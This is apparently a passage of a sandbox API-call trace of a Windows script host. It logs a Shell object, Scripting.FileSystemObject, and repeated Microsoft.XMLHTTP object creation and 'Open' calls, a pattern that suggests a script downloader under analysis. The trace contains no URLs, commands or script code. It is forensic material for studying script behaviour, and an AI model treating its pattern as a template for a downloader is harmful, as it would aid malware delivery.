	[0622.151] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0622.151] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0622.151] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0622.151] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0622.151] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0622.151] SysStringLen (param_1=0x0) returned 0x0
	[0622.151] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0622.154] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0622.154] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0622.155] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0622.155] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0622.155] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0622.155] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0624.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0624.723] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0624.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0624.725] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0624.725] SysStringLen (param_1=0x0) returned 0x0
	[0624.725] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0624.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0624.725] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0624.725] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0624.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0624.725] ??2@YAPEAX_K@Z () returned 0x62f310
	[0624.725] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0624.725] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0624.725] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0624.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0624.725] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0624.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0624.726] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0624.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0624.728] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0624.728] SysStringLen (param_1=0x0) returned 0x0
	[0624.728] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0624.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0624.729] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0624.729] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0624.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0624.729] ??2@YAPEAX_K@Z () returned 0x62f330
	[0624.729] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0624.729] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0624.729] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0624.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0624.729] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0624.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0624.729] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0624.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0624.733] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0624.733] SysStringLen (param_1=0x0) returned 0x0
	[0624.733] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0624.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0624.733] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0624.733] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0624.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0624.733] ??2@YAPEAX_K@Z () returned 0x62f310
	[0624.733] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0624.733] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0624.733] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0624.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0624.734] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0624.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0624.734] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0624.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0624.734] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0624.734] SysStringLen (param_1=0x0) returned 0x0
	[0624.734] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0624.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0624.734] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0624.735] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0624.735] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0624.735] ??2@YAPEAX_K@Z () returned 0x62f330
	[0624.735] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0624.735] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0624.735] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0624.735] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0624.735] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0624.735] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0624.735] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0624.735] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0624.736] longjmp () 
	[0624.736] longjmp () 
	[0624.736] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0624.736] SysStringLen (param_1=0x0) returned 0x0
	[0624.736] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0624.736] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0624.736] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0624.736] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0624.736] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0624.736] ??2@YAPEAX_K@Z () returned 0x62f310
	[0624.736] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0624.736] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0624.737] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0624.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0624.737] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0624.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0624.737] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0624.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0624.737] longjmp () 
	[0624.737] longjmp () 
	[0624.738] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0624.738] SysStringLen (param_1=0x0) returned 0x0
	[0624.738] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0624.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
